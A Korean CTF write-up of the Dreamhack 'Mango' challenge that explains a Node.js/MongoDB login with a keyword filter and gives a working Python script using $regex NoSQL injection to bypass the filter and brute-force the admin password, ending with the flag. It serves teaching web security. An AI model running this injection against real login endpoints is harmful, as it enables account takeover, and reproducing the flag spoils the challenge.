[Dreamhack] Mango

 

 

[문제 파일]

const BAN = ['admin', 'dh', 'admi'];

filter = function(data){
    const dump = JSON.stringify(data).toLowerCase();
    var flag = false;
    BAN.forEach(function(word){
        if(dump.indexOf(word)!=-1) flag = true;
    });
    return flag;
}

• 배열 BAN에 있는 문자열을 필터링한다. (admin을 쳤을 때 플래그가 바로 뜨지 않도록 한 코드)

app.get('/login', function(req, res) {
    if(filter(req.query)){
        res.send('filter');
        return;
    }
    const {uid, upw} = req.query;

    db.collection('user').findOne({
        'uid': uid,
        'upw': upw,
    }, function(err, result){
        if (err){
            res.send('err');
        }else if(result){
            res.send(result['uid']);
        }else{
            res.send('undefined');
        }
    })
});

• 로그인 페이지가 요청되는 실행되는 코드
• 쿼리를 요청하고 필터링
• 이용자가 전송한 id랑 패스워드를 가져옴
• 데이터베이스에서 아이디와 패스워드를 검색 후 있으면 유저 아이디를 출력하고 없으면 undefined 출력
• 로그인에 성공 시 아이디 출력, 블라인드 sql 활용해서 비밀번호 확인

---

[풀이]

 

플래그를 찾기 위한 코드를 작성한다. (플래그가 32자리임을 알고 있으므로 for문을 사용해 작성)

• 3 : HOST 변수에 공격할 페이지를 지정
• 7~13 : 플래그가 총 32자리이므로 플래그가 다 출력될 때까지 for문을 돌림
• 9 : 아이디가 ad로 시작하고 패스워드가 D(플래그는 DH{...} 형태)로 시작하는 데이터를 조회하여 response 변수에 저장
• 13 : flag 출력

 

위 코드를 실행하면

플래그가 차례로 출력되는 것을 볼 수 있다.

 

 

 

+) for문 대신 while문 사용하여 코드 작성 (플래그가 몇자리인지 모를 때 사용)

import requests
import string

url = 'http://host3.dreamhack.games:24007/login'
flag_set = string.digits + string.ascii_letters + '}'
flag = ''

while True:
    for ch in flag_set:
        response = requests.get(url + "?uid[$regex]=ad.in&upw[$regex]=D.{" + flag + ch)
        if response.text == 'admin':
            flag += ch
            break
    print(flag)
    
    if '}' in flag :
        break

print('DH{'+flag)

 

실행결과

 

답 : DH{89e50fa6fafe2604e33c0ba05843d3df}